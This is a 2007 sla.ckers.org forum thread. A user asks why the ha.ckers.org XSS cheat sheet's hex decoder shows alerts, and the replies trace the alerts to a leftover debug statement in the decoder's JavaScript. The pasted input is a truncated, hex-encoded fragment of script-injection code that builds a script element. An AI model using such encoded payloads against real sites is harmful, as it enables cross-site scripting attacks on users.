Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Bug reports, feature enhancements or other complaints with the site, with us or just tell us what a miserable existance you have. No death threats or poetry please. Just kidding, no poetry please. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
http://ha.ckers.org/xss.html
Posted by: darknessends
Date: December 22, 2007 01:43AM

Go To
http://ha.ckers.org/xss.html

In the textbox before " Decode Hex Entities To Ascii " paste the following

&#x64&#x65&#x3B&#x73&#x63&#x72&#x3D&#x64&#x6F&#x63&#x75&#x6D&#x65&#x6E&#x74&#x2E&#x63&#x72&#x65&#x61&#x74&#x65&#x45&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x28&#x78&#x28&#x31&#x31&#x35&#x2C&#x39&#x39&#x2C&#x31&#x31&#x34&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x32&#x2C&#x31&#x31&#x36&#x29&#x29&#x3B&#x73&#x63&#x72&#x2E&#x73&#x65&#x74&#x41&#x74&#x74

Click the " Decode Hex Entities To Ascii " Button.....

Now tell me what is this happening ?

Options: ReplyQuote
Re: http://ha.ckers.org/xss.html
Posted by: darknessends
Date: December 24, 2007 10:40AM

3 days - 55 Views And No Replies ? Am I asking something kiddish, pardon me please and let me understand what actually is going on ?

Options: ReplyQuote
Re: http://ha.ckers.org/xss.html
Posted by: thornmaker
Date: December 24, 2007 11:40AM

The question is not kiddish, but there's nothing magical going on either. When you click the "decode hex entities to ascii" button, the JavaScript function convertHexToASCII() gets called. That function is located in the file xssscript.js. The function checks the length of each hex entity... since the semicolon is missing from each entity, the first part of the if statement gets used rather then the second, and that first part has an alert in it... so it alerts once per malformed hex entity. So why is there an alert there? I would guess it is just a debugging statement that rsnake forgot to take out and no one has really noticed because most people probably enter in properly formatted hex entities. Does that make sense?

Here's the convertHexToASCII() function for reference:
function convertHexToASCII() {
if (document.XSS.hexhtml.value != '') {
var hexText = document.XSS.hexhtml.value;
var testText = hexText.substring(3,hexText.length).split("&#x");
var resultString = '';
var sub = '';
for (i=0;i<testText.length;i++) {
sub = testText.substring(testText.length-3,testText.length-1)
if (sub.length < 2) {
resultString += "%0" + sub;
alert (sub, " - ", resultString);
} else {
resultString += "%" + sub;
}
document.XSS.ascii.value = unescape(resultString);
}
}
}

Options: ReplyQuote
Re: http://ha.ckers.org/xss.html
Posted by: darknessends
Date: December 25, 2007 11:02AM

Perfect..........

Options: ReplyQuote
Re: http://ha.ckers.org/xss.html
Posted by: rsnake
Date: December 30, 2007 02:34PM

Holidays were murder on my ability to be online. Yes, that's exactly what was going on.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.